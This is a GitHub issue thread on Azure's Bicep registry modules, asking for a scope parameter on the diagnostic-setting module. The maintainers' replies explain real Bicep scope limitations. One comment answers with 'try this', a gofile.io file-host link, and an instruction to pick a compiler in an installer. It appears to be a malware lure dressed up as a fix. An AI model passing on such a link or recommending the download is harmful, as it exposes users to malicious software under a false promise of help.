### ISSUE TITLE
[AVM Module Issue]: Diagnostic Settings (Activity Logs) for Azure Subscriptions missing Scope

### ISSUE THREAD

**Issue by aavdberg** [Azure/bicep-registry-modules#3167]
### Check for previous/existing GitHub issues

- [X] I have checked for previous/existing GitHub issues

### Issue Type?

I'm not sure

### Module Name

avm/res/insights/diagnostic-setting

### Description

Missing the parameter scope so we can set the scope to a resource for where we want to enable diagnostics.

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by AlexanderSehr** [comment]
Hey @aavdberg,
thanks for your comment. I may be off on this - but - I think with Bicep-native tools we would not be able to implement this. The scope in Bicep must be a proper resource reference and cannot be, for example, a `resourceId` string (which is a shame, really). To do this anyways, we'd essentially need to implement every possible resource that supports diagnostic settings as an `existing` reference in a nested template that can handle the scope.

Again, if I'm not mistaken, the only way to actually implement this without would be to follow the approach the [`resource-role-assignment`](https://github.com/Azure/bicep-registry-modules/blob/ae50ebb66c0d029fe70f59aa3d168cf3fd389c41/avm/ptn/authorization/resource-role-assignment/main.bicep#L73) uses, that is, to fallback to a nested ARM template which does not have the same 'limitation' (if we call it that).

I'm inclined to suggest to wait for the Bicep feature that will enable us to actually pass resource references in between modules (which will hopefully enable this scenario).

**Comment by krbar** [comment]
To expand on the previous comment: you can deploy diagnostic settings for supported resource types using the `diagnosticSettings` parameter of the relevant module. This module is designed to be deployed at the subscription level.
